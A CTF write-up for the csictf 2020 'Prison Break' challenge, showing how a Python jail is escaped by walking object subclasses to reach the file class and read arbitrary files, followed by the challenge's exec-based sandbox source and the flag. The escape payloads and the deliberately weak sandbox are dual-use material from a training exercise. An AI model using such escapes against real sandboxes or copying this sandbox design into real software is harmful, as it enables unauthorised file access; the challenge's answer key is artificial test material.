csictf 2020

CTF Writeup - https://ctftime.org/event/1081

Home csictf 2020 Writeups Home
22 July 2020

Prison Break

by vishalananth

I saw them put someone in jail. Can you find out who it is? They said this is the best prison ever built. You sure can’t break it, can you?

nc chall.csivit.com 30407

Solution

We netcat into the given IP and notice that the python interpreter is open and many common commands are banned. So like with any python jail we try different things to bypass the banned commands. We see print(dir()) works and hence decide to proceed along those lines. We try

print(dir(__builtins__))

We then try

print(().__class__.__base__.__subclasses__())

This prints a lot of useful classes among which was the file class. So we try to open the flag file with

print(().__class__.__base__.__subclasses__()[40]("flag.txt","r").read())

We see it does not have the flag and asks us to check the source code for flag. So I randomly tried

print(().__class__.__base__.__subclasses__()[40]("jail.py","r").read())

and got the source code which had the flag

#!/usr/bin/python

import sys

class Sandbox(object):
    def execute(self, code_string):
        exec(code_string)
        sys.stdout.flush()

sandbox = Sandbox()

_raw_input = raw_input

main = sys.modules["__main__"].__dict__
orig_builtins = main["__builtins__"].__dict__

builtins_whitelist = set((
    #exceptions
    'ArithmeticError', 'AssertionError', 'AttributeError', 'Exception',

    #constants
    'False', 'None', 'True',

    #types
    'basestring', 'bytearray', 'bytes', 'complex', 'dict',

    #functions
    'abs', 'bin', 'dir', 'help'

    # blocked: eval, execfile, exit, file, quit, reload, import, etc.
))

for builtin in orig_builtins.keys():
    if builtin not in builtins_whitelist:
        del orig_builtins[builtin]

print("Find the flag.")
sys.stdout.flush()

def flag_function():
    flag = "csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}"

while 1:
    try:
        sys.stdout.write(">>> ")
        sys.stdout.flush()
        code = _raw_input()
        sandbox.execute(code)

    except Exception:
        print("You have encountered an error.")
        sys.stdout.flush()

Flag

csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}
tags: Miscellaneous